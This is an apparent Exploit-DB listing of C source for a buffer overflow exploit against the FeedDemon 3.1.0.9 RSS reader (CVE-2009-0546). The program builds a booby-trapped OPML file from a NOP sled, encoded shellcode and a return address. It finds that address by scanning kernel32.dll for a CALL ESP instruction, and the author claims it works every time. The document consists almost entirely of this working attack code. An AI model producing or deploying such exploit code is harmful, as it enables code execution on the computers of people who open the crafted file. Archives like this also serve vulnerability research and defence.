feedDemon 3.1.0.9 - opml File Buffer Overflow Exploit



EDB-ID: 11379 CVE: 2009-0546 OSVDB-ID: 51753
Author: fl0 fl0w Published: 2010-02-09 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
/*Download latest vuln app :http://www.newsgator.com/Individuals/FeedDemon/Default.aspx
  This exploit identifies your OS and searches in memory for a RETCODE thus working 100%.*/
#include<stdio.h>
#include<string.h>
#include<getopt.h>
#include<windows.h>
void banner();
void exploit(char*);
 void print(char*);
 unsigned int getFsize(FILE*,char*);
 int cpy(char*,char*);
 void gen_random(char*,const int);
 DWORD FindRetToEspAddress(VOID);
 DWORD SearchStream(const char*,size_t,const char*,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
#define VULNF           "test.opml"
#define VER             "3.1.0.9"
#define POCNAME         "feedDemon opml file buffer overflow exploit"
#define AUTHOR          "fl0 fl0w"
#define IF(x,NULL)      if(x==NULL)
#define FOR(i,a,b)      for(i=a;i<b;++i)
#define NOPS            8006
#define FREE(x)         (free(x),x=NULL)
#define NUL             '\0'
#define START           {
#define END             }
#define MYSZ            size_t
#define ALLOC(i,k)      malloc((MYSZ)(i)*(MYSZ)(k))
#define WXP_DELTA 0xA67FF; // SP2 Fully patched!!
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
#define EIPOFFSET       168
#define EIPNOPOFFS      8174        
   typedef unsigned char BYTE; //8 bits
 typedef unsigned short WORD; //2 bytes=16 bits
 typedef unsigned long DWORD; //4 bytes=32 bits
 typedef unsigned long long QWORD; //8 bytes=64bits
 DWORD  g_dwOsVersion        = 0;
LPVOID g_PatchAddress       = NULL;


typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
									DWORD ,
									LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
									char  *lpBaseName,
									DWORD nSize);

typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
 typedef enum {
         Error = -1,
         True,
         False=0,
         success,
         }Boolean;
 enum OSes
{
	OS_WXP=1,
	OS_W2K,
	OS_W2K3,
	OS_VISTA
};
  char shellcode[]={
"\x31\xC9\x83\xE9\xDE\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xEC" // 204 bytes
"\x2D\x36\x5E\x83\xEB\xFC\xE2\xF4\x10\xC5\x72\x5E\xEC\x2D\xBD"
"\x1B\xD0\xA6\x4A\x5B\x94\x2C\xD9\xD5\xA3\x35\xBD\x1\xCC\x2C"
"\xDD\x17\x67\x19\xBD\x5F\x2\x1C\xF6\xC7\x40\xA9\xF6\x2A\xEB"
"\xEC\xFC\x53\xED\xEF\xDD\xAA\xD7\x79\x12\x5A\x99\xC8\xBD\x1"
"\xC8\x2C\xDD\x38\x67\x21\x7D\xD5\xB3\x31\x37\xB5\x67\x31\xBD"
"\x5F\x7\xA4\x6A\x7A\xE8\xEE\x7\x9E\x88\xA6\x76\x6E\x69\xED"
"\x4E\x52\x67\x6D\x3A\xD5\x9C\x31\x9B\xD5\x84\x25\xDD\x57\x67"
"\xAD\x86\x5E\xEC\x2D\xBD\x36\xD0\x72\x7\xA8\x8C\x7B\xBF\xA6"
"\x6F\xED\x4D\xE\x84\xDD\xBC\x5A\xB3\x45\xAE\xA0\x66\x23\x61"
"\xA1\xB\x4E\x57\x32\x8F\x2D\x36\x5E\x90\x90\x90\x90\x90\x90"
"\x90\x90" 
"\x41\x41\x41\x41"        // "\xED\x1E\x94\x7C" -1 EIP offset 8368 from the beggining of the file or 168bytes from the start of shellcode buffer
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"    //nopsleed                      
"\x90\x90\x90\x90\x90\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD" 
"\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"};
   char header[]=
 {
    0xFF, 0xFE, 0x3C, 0x00, 0x6F, 0x00, 0x70, 0x00, 0x6D, 0x00, 0x6C, 0x00, 0x20, 0x00, 0x76, 0x00, 
    0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x3D, 0x00, 0x22, 0x00, 
    0x31, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x22, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x62, 0x00, 0x6F, 0x00, 
    0x64, 0x00, 0x79, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x6C, 0x00, 
    0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x20, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, //83 bytes
    0x3D, 0x00, 0x22, 0x00 };
    char tail[]=
{
    0x22, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x6C, 0x00, 0x69, 0x00, 
    0x6E, 0x00, 0x65, 0x00, 0x20, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x3D, 0x00, 
    0x22, 0x00, 0x42, 0x00, 0x4B, 0x00, 0x49, 0x00, 0x53, 0x00, 0x22, 0x00, 0x20, 0x00, 0x74, 0x00, 
    0x69, 0x00, 0x74, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x3D, 0x00, 0x22, 0x00, 0x53, 0x00, 0x56, 0x00, 
    0x52, 0x00, 0x54, 0x00, 0x22, 0x00, 0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00, 0x65, 0x00, 
    0x3D, 0x00, 0x22, 0x00, 0x72, 0x00, 0x73, 0x00, 0x73, 0x00, 0x22, 0x00, 0x20, 0x00, 0x78, 0x00, 
    0x6D, 0x00, 0x6C, 0x00, 0x55, 0x00, 0x72, 0x00, 0x6C, 0x00, 0x3D, 0x00, 0x22, 0x00, 0x68, 0x00, 
    0x74, 0x00, 0x74, 0x00, 0x70, 0x00, 0x3A, 0x00, 0x2F, 0x00, 0x2F, 0x00, 0x6D, 0x00, 0x69, 0x00, 
    0x6C, 0x00, 0x77, 0x00, 0x30, 0x00, 0x72, 0x00, 0x6D, 0x00, 0x2E, 0x00, 0x63, 0x00, 0x6F, 0x00, 
    0x6D, 0x00, 0x2F, 0x00, 0x72, 0x00, 0x73, 0x00, 0x73, 0x00, 0x2E, 0x00, 0x70, 0x00, 0x68, 0x00, 
    0x70, 0x00, 0x22, 0x00, 0x2F, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00, 0x6F, 0x00, 0x75, 0x00, 
    0x74, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00, 
    0x62, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x79, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00, 0x6F, 0x00, 
    0x70, 0x00, 0x6D, 0x00, 0x6C, 0x00, 0x3E, 0x00, 
} ;

  char buffer[10000000];
   char eip2[]="\x8B\xDC\x67\x02";
   char jmpreg[]="\x89\xCC\xFF\xE4";// offset 8290 bytes
  // char endp[]=;
   unsigned char nop=0x90;
   signed int c;
   int x;
   DWORD eip;
 int main(){
        //if(argc>2) 
        //  while(c=getopt()!=EOF) ...... 
        //    else 
        //   os(ret);  
        banner();
           exploit(VULNF); 
           GetNtosDelta();
           printf("[!]Your Retcode is: 0x%X\n",eip);
          print("Done!");
          printf("File is : %d bytes",x);
        //  printf("%d",strlen(shellcode));
          getchar();
           return 0;
     }
    void exploit(char* fname){
         FILE* f=fopen(fname,"wb");
            if(f) {
               memset(buffer,0x90,NOPS);
                eip=FindRetToEspAddress();
                memcpy(shellcode+EIPOFFSET,&eip,4);
               fwrite(header,sizeof(char),84,f);
                fwrite(buffer,sizeof(char),NOPS,f);
                fwrite(shellcode,sizeof(char),204,f);
               fwrite(tail,sizeof(char),216,f);
                 fclose(f);
                   free(buffer);
                   }
                 else {print("error writing file");   exit(0);}
                   x=getFsize(f,VULNF); 
         } 
     void banner(){printf("[*]%s\n[*]Ver %s\n[*]Author %s\n",POCNAME,VER,AUTHOR); }    
void gen_random(char *s, const int len)
    { int i; //helps u find the offsets 
      static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
     
      FOR(i,0,len)
      {
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
      }
       s[len]=0;
      }
   unsigned int getFsize(FILE* g,char* gname)
    {
             unsigned int s;
            
             g=fopen(gname,"rb");
             
             IF(g,NULL)
             {
             print("File error at reading");
             exit(0);
             }            
             fseek(g,0,SEEK_END);
             s=ftell(g);
             
             return s;
    }
      int cpy(char* source,char* dest)
    {
        int len;
        len=strlen(source);
        memcpy(dest,&source,len+1);
        return len;
    }     
    void print(char* msg)
    { 
       printf("[*]%s\n",msg); 
    }   
    DWORD GetOSVersion (VOID)
 {
	OSVERSIONINFOA  osvi;
	DWORD retval = 0;

	osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);

	if ( GetVersionExA(&osvi) )
	{
		if (osvi.dwMajorVersion == 5)
		{
			switch(osvi.dwMinorVersion)
			{
				case 0:
					retval = OS_W2K;
					break;
				case 1:
					retval = OS_WXP;
					break;
				case 2:
					retval = OS_W2K3;
					break;
			}
		}	

		else if (osvi.dwMajorVersion == 6)
		{
			retval = OS_VISTA;
		}
	}

	g_dwOsVersion = retval;

	return retval;
 }

  DWORD GetNtosDelta (VOID)
 {
	DWORD retval = 0;

	switch(GetOSVersion())
	{
		case OS_VISTA:
			print("System identified as Windows Vista\n");
			retval = WVISTA_DELTA;
			break;
		case OS_W2K:
			print("System identified as Windows 2000\n");
			retval = W2K_DELTA;
			break;
		case OS_W2K3:
			print("System identified as Windows 2003\n");
			retval = W2K3_DELTA;
			break;
		case OS_WXP:
			print("System identified as Windows XP\n");
			retval = WXP_DELTA;
			break;
		default:
			print("Unidentified system!\n");
	}

	return retval;
		
 }
   DWORD SearchStream(
    const char *pvStream,
    size_t uStreamSize,
    const char *pvSubStream,
    size_t uSubStreamSize
)
{
    unsigned int uCount = 0,i,j;

    while( (uStreamSize) > (uCount) ) {
        for(i=0;i<=(uSubStreamSize-1);i++) {
            if(*pvStream != pvSubStream[i]) {
                *pvStream++;
                if( i>0 ) {
                    for(j=0;j<i;j++)
                        *pvStream--;
                }
                break;
            }
            if( i == (uSubStreamSize-1) )
                return (uCount);
            *pvStream++;
        }
        uCount++;
    }

    return -1;
}

DWORD FindRetToEspAddress(VOID)
{
    HMODULE hModule = GetModuleHandle("kernel32.dll");
    DWORD dwEspRet;
    char* pszCallEsp = "\xFF\xD4"; // CALL ESP
    PIMAGE_DOS_HEADER pimage_dos_header;
    PIMAGE_NT_HEADERS pimage_nt_headers;

    pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
    pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);

    dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));

    return (dwEspRet += (DWORD)hModule);
}